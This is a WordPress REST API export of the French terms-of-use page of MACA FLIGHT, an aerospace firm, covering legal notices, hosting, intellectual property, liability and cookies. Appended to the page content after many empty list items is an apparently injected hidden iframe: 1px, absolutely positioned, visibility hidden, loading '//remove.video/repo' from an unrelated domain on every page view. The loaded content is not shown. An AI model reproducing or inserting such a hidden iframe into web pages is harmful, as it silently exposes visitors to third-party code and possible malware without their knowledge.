{"id":1181,"date":"2021-12-15T21:32:43","date_gmt":"2021-12-15T20:32:43","guid":{"rendered":"https:\/\/macaflight.com\/?page_id=1181"},"modified":"2021-12-15T21:34:34","modified_gmt":"2021-12-15T20:34:34","slug":"terms-and-conditions-of-use","status":"publish","type":"page","link":"https:\/\/macaflight.com\/fr\/conditions-generales-dutilisation\/","title":{"rendered":"CONDITIONS G\u00c9N\u00c9RALES D'UTILISATION"},"content":{"rendered":"<div data-elementor-type=\"wp-page\" data-elementor-id=\"1181\" class=\"elementor elementor-1181\" data-elementor-settings=\"[]\">\n\t\t\t\t\t\t<div class=\"elementor-inner\">\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7f4b695 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7f4b695\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-thegem\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-067c288\" data-id=\"067c288\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d85b971 flex-horizontal-align-default flex-horizontal-align-tablet-default flex-horizontal-align-mobile-default flex-vertical-align-default flex-vertical-align-tablet-default flex-vertical-align-mobile-default elementor-widget elementor-widget-text-editor\" data-id=\"d85b971\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<style>\/*! elementor - v3.5.5 - 03-02-2022 *\/\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#818a91;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#818a91;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}<\/style>\t\t\t\t\t<div class=\"elementor-text-editor elementor-clearfix\">\n\t\t\t\t<ol><li><strong> LES MENTIONS L\u00c9GALES<\/strong><\/li><\/ol><p>L'\u00e9dition du site https:\/\/macaflight.com\/fr\/ assur\u00e9e par la Soci\u00e9t\u00e9 MACA au capital de 184000, euros,\nimmatricul\u00e9e au RCS d\u2019Aix-en-Provence le 25-11-2020 sous le num\u00e9ro B 891373508, dont le si\u00e8ge social est situ\u00e9 au AV LOUIS PHILIBERT 13100 AIX-EN-PROVENCE. <\/br>\nNum\u00e9ro de t\u00e9l\u00e9phone +33 1 73 79 34 60<\/br>Adresse e-mail : contact@macaflight.com.<\/p><p>Le Directeur de la publication est : Thierry de Boisvilliers<\/br>\nNum\u00e9ro de TVA intracommunautaire : FR 92891373508<\/p><p><p><\/p><p>L'h\u00e9bergeur du site OVH SAS est une filiale de la soci\u00e9t\u00e9 OVH Groupe SA, soci\u00e9t\u00e9 immatricul\u00e9e au RCS de Lille sous le num\u00e9ro 537 407 926 sise 2, rue Kellermann, 59100 Roubaix.<\/p><ol start=\"2\"><li><strong> ACC\u00c8S AU SITE<\/strong><\/li><\/ol><p>Le site https:\/\/www.macaflight.com permet \u00e0 l'Utilisateur un acc\u00e8s gratuit aux services suivants :<\/p><p>Le site internet propose les services suivants :<\/p><p>Construction a\u00e9ronautique et spatiale<\/p><p>Le site est accessible gratuitement en tout lieu \u00e0 tout Utilisateur ayant un acc\u00e8s \u00e0 Internet. Tous les frais support\u00e9s par l'Utilisateur pour acc\u00e9der au service (mat\u00e9riel informatique, logiciels, connexion Internet, etc.) sont \u00e0 sa charge.<\/p><ol start=\"3\"><li><strong> COLLECTE DES DONN\u00c9ES<\/strong><\/li><\/ol><p>Le site est exempt\u00e9 de d\u00e9claration \u00e0 la Commission Nationale Informatique et Libert\u00e9s (CNIL) dans la mesure o\u00f9 il ne collecte\naucune donn\u00e9e concernant les Utilisateurs.<\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p>\u00a0<p><\/p><p>\u00a0<p><\/p><p><p><\/p><p><p><\/p><ol start=\"4\"><li><strong> PROPRI\u00c9T\u00c9 INTELLECTUELLE<\/strong><\/li><\/ol><p>Les marques, logos, signes ainsi que tous les contenus du site (textes, images, son\u2026) font l'objet d'une protection par le Code de la propri\u00e9t\u00e9 intellectuelle et plus particuli\u00e8rement par le droit d'auteur.<\/p><p>La marque MACA est une marque d\u00e9pos\u00e9e. Toute repr\u00e9sentation et\/ou reproduction et\/ou exploitation partielle ou totale de cette marque, de quelque nature que ce soit, est totalement prohib\u00e9e.<\/p><p>L'Utilisateur doit solliciter l'autorisation pr\u00e9alable du site pour toute reproduction, publication, copie des diff\u00e9rents contenus. Il s'engage \u00e0 une utilisation des contenus du site dans un cadre strictement priv\u00e9, toute utilisation \u00e0 des fins commerciales et publicitaires est strictement interdite.<\/p><p>Toute repr\u00e9sentation totale ou partielle de ce site par quelque proc\u00e9d\u00e9 que ce soit, sans l\u2019autorisation expresse de l\u2019exploitant du site Internet constituerait une contrefa\u00e7on sanctionn\u00e9e par l\u2019article L 335-2 et suivants du Code de la propri\u00e9t\u00e9 intellectuelle.<\/br>Il est rappel\u00e9 conform\u00e9ment \u00e0 l\u2019article L122-5 du Code de propri\u00e9t\u00e9 intellectuelle que l\u2019Utilisateur qui reproduit, copie ou publie le contenu prot\u00e9g\u00e9 doit citer l\u2019auteur et sa source.<\/p><p><b>ARTICLE 5 : RESPONSABILIT\u00c9<\/b><\/br>\nLes sources des informations diffus\u00e9es sur le site https:\/\/www.macaflight.com sont r\u00e9put\u00e9es fiables mais le site ne garantit pas qu\u2019il soit exempt de d\u00e9fauts, d\u2019erreurs ou d\u2019omissions.\nLes informations communiqu\u00e9es sont pr\u00e9sent\u00e9es \u00e0 titre indicatif et g\u00e9n\u00e9ral sans valeur contractuelle. Malgr\u00e9 des mises \u00e0 jour r\u00e9guli\u00e8res, le site https:\/\/www.macaflight.com ne peut \u00eatre tenu responsable de la modification des dispositions administratives et juridiques survenant apr\u00e8s la publication. De m\u00eame, le site ne peut \u00eatre tenue responsable de l\u2019utilisation et de l\u2019interpr\u00e9tation de l\u2019information contenue dans ce site.\nLe site https:\/\/www.macaflight.com ne peut \u00eatre tenu pour responsable d\u2019\u00e9ventuels virus qui pourraient infecter l\u2019ordinateur ou tout mat\u00e9riel informatique de l\u2019Internaute, suite \u00e0 une utilisation, \u00e0 l\u2019acc\u00e8s, ou au t\u00e9l\u00e9chargement provenant de ce site.\nLa responsabilit\u00e9 du site ne peut \u00eatre engag\u00e9e en cas de force majeure ou du fait impr\u00e9visible et insurmontable d'un tiers.<\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><ol start=\"6\"><li><strong> LIENS HYPERTEXTES<\/strong><\/li><\/ol><p>Des liens hypertextes peuvent \u00eatre pr\u00e9sents sur le site. L\u2019Utilisateur est inform\u00e9 qu\u2019en cliquant sur ces liens, il sortira du site https:\/\/www.macaflight.com. Ce dernier n\u2019a pas de contr\u00f4le sur les pages web sur lesquelles aboutissent ces liens et ne saurait, en aucun cas, \u00eatre responsable de leur contenu.<\/p><p><p><\/p><p><p><\/p><p><p><\/p><ol start=\"7\"><li><strong> COOKIES<\/strong><\/li><\/ol><p>L\u2019Utilisateur est inform\u00e9 que lors de ses visites sur le site, un cookie peut s\u2019installer automatiquement sur son logiciel de navigation.<\/p><p>Les cookies sont de petits fichiers stock\u00e9s temporairement sur le disque dur de l\u2019ordinateur de l\u2019Utilisateur par votre navigateur et qui sont n\u00e9cessaires \u00e0 l\u2019utilisation du site https:\/\/www.macaflight.com.<\/p><p>Les cookies ne contiennent pas d\u2019information personnelle et ne peuvent pas \u00eatre utilis\u00e9s pour identifier quelqu\u2019un. Un cookie contient un identifiant unique, g\u00e9n\u00e9r\u00e9 al\u00e9atoirement et donc anonyme.<\/p><p>Certains cookies expirent \u00e0 la fin de la visite de l\u2019Utilisateur, d\u2019autres restent.\nL\u2019information contenue dans les cookies est utilis\u00e9e pour am\u00e9liorer le site https:\/\/www.macaflight.com.<\/p><p>En naviguant sur le site, L\u2019Utilisateur les accepte.\nL\u2019Utilisateur doit toutefois donner son consentement quant \u00e0 l\u2019utilisation de certains cookies.<\/p><p>A d\u00e9faut d\u2019acceptation, l\u2019Utilisateur est inform\u00e9 que certaines fonctionnalit\u00e9s ou pages risquent de lui \u00eatre refus\u00e9es.\nL\u2019Utilisateur pourra d\u00e9sactiver ces cookies par l\u2019interm\u00e9diaire des param\u00e8tres figurant au sein de son logiciel de navigation.<\/p><ol start=\"8\"><li><strong> DROIT APPLICABLE ET JURIDICTION COMP\u00c9TENTE<\/strong><\/li><\/ol><p>La l\u00e9gislation fran\u00e7aise s'applique au pr\u00e9sent contrat. En cas d'absence de r\u00e9solution amiable d'un litige n\u00e9 entre les parties, les tribunaux fran\u00e7ais seront seuls comp\u00e9tents pour en conna\u00eetre.<\/p><p>\u00a0Pour toute question relative \u00e0 l\u2019application des pr\u00e9sentes CGU, vous pouvez joindre l\u2019\u00e9diteur aux coordonn\u00e9es inscrites \u00e0 l\u2019ARTICLE 1.<\/p><p><i>R\u00e9alis\u00e9 sur https:\/\/www.legalplace.fr<\/i><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><ol start=\"9\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><ol start=\"10\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><p><p><\/p><ol start=\"11\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><ol start=\"12\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><ol start=\"13\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><ol start=\"14\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><ol start=\"15\"><li><strong> <p><\/strong><\/li><\/ol><p><p><\/p><p><p><\/p><ol start=\"16\"><li><strong> <p><\/strong><\/li><\/ol><p class=\" translation-block\"><p><\/p><p class=\" translation-block\"><p><\/p><p class=\" translation-block\"><p><\/p><ol start=\"21\"><li><strong> <p><\/strong><\/li><\/ol><p class=\" translation-block\"><p><\/p><p class=\" translation-block\"><p><\/p><p class=\" translation-block\"><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p><p><\/p><p>\u00a0<\/p><p>\u00a0<\/p><p>\u00a0<\/p><div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>","protected":false},"excerpt":{"rendered":"<p>Introduction 1.1&nbsp;&nbsp;&nbsp;&nbsp; These terms and conditions shall govern your use of our website. 1.2&nbsp;&nbsp;&nbsp;&nbsp; By using our website, you accept&#8230;<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-fullwidth.php","meta":{"footnotes":""},"class_list":["post-1181","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.13 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Terms and conditions of use - MACA FLIGHT<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/macaflight.com\/fr\/conditions-generales-dutilisation\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Terms and conditions of use - MACA FLIGHT\" \/>\n<meta property=\"og:description\" content=\"Introduction 1.1&nbsp;&nbsp;&nbsp;&nbsp; These terms and conditions shall govern your use of our website. 1.2&nbsp;&nbsp;&nbsp;&nbsp; By using our website, you accept...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/macaflight.com\/fr\/conditions-generales-dutilisation\/\" \/>\n<meta property=\"og:site_name\" content=\"MACA FLIGHT\" \/>\n<meta property=\"article:modified_time\" content=\"2021-12-15T20:34:34+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/macaflight.com\/terms-and-conditions-of-use\/\",\"url\":\"https:\/\/macaflight.com\/terms-and-conditions-of-use\/\",\"name\":\"Terms and conditions of use - MACA FLIGHT\",\"isPartOf\":{\"@id\":\"https:\/\/macaflight.com\/#website\"},\"datePublished\":\"2021-12-15T20:32:43+00:00\",\"dateModified\":\"2021-12-15T20:34:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/macaflight.com\/terms-and-conditions-of-use\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/macaflight.com\/terms-and-conditions-of-use\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/macaflight.com\/terms-and-conditions-of-use\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/macaflight.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Terms and conditions of use\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/macaflight.com\/#website\",\"url\":\"https:\/\/macaflight.com\/\",\"name\":\"MACA FLIGHT\",\"description\":\"Future is in the air\",\"publisher\":{\"@id\":\"https:\/\/macaflight.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/macaflight.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/macaflight.com\/#organization\",\"name\":\"MACA FLIGHT\",\"url\":\"https:\/\/macaflight.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/macaflight.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/macaflight.com\/wp-content\/uploads\/2021\/12\/logo-maca-degrade.png\",\"contentUrl\":\"https:\/\/macaflight.com\/wp-content\/uploads\/2021\/12\/logo-maca-degrade.png\",\"width\":2000,\"height\":677,\"caption\":\"MACA FLIGHT\"},\"image\":{\"@id\":\"https:\/\/macaflight.com\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Terms and conditions of use - MACA FLIGHT","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/macaflight.com\/fr\/conditions-generales-dutilisation\/","og_locale":"fr_FR","og_type":"article","og_title":"Terms and conditions of use - MACA FLIGHT","og_description":"Introduction 1.1&nbsp;&nbsp;&nbsp;&nbsp; These terms and conditions shall govern your use of our website. 1.2&nbsp;&nbsp;&nbsp;&nbsp; By using our website, you accept...","og_url":"https:\/\/macaflight.com\/fr\/conditions-generales-dutilisation\/","og_site_name":"MACA FLIGHT","article_modified_time":"2021-12-15T20:34:34+00:00","twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/macaflight.com\/terms-and-conditions-of-use\/","url":"https:\/\/macaflight.com\/terms-and-conditions-of-use\/","name":"Terms and conditions of use - MACA FLIGHT","isPartOf":{"@id":"https:\/\/macaflight.com\/#website"},"datePublished":"2021-12-15T20:32:43+00:00","dateModified":"2021-12-15T20:34:34+00:00","breadcrumb":{"@id":"https:\/\/macaflight.com\/terms-and-conditions-of-use\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/macaflight.com\/terms-and-conditions-of-use\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/macaflight.com\/terms-and-conditions-of-use\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/macaflight.com\/"},{"@type":"ListItem","position":2,"name":"Terms and conditions of use"}]},{"@type":"WebSite","@id":"https:\/\/macaflight.com\/#website","url":"https:\/\/macaflight.com\/","name":"MACA FLIGHT","description":"Future is in the air","publisher":{"@id":"https:\/\/macaflight.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/macaflight.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/macaflight.com\/#organization","name":"MACA FLIGHT","url":"https:\/\/macaflight.com\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/macaflight.com\/#\/schema\/logo\/image\/","url":"https:\/\/macaflight.com\/wp-content\/uploads\/2021\/12\/logo-maca-degrade.png","contentUrl":"https:\/\/macaflight.com\/wp-content\/uploads\/2021\/12\/logo-maca-degrade.png","width":2000,"height":677,"caption":"MACA FLIGHT"},"image":{"@id":"https:\/\/macaflight.com\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/pages\/1181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/comments?post=1181"}],"version-history":[{"count":6,"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/pages\/1181\/revisions"}],"predecessor-version":[{"id":1498,"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/pages\/1181\/revisions\/1498"}],"wp:attachment":[{"href":"https:\/\/macaflight.com\/fr\/wp-json\/wp\/v2\/media?parent=1181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}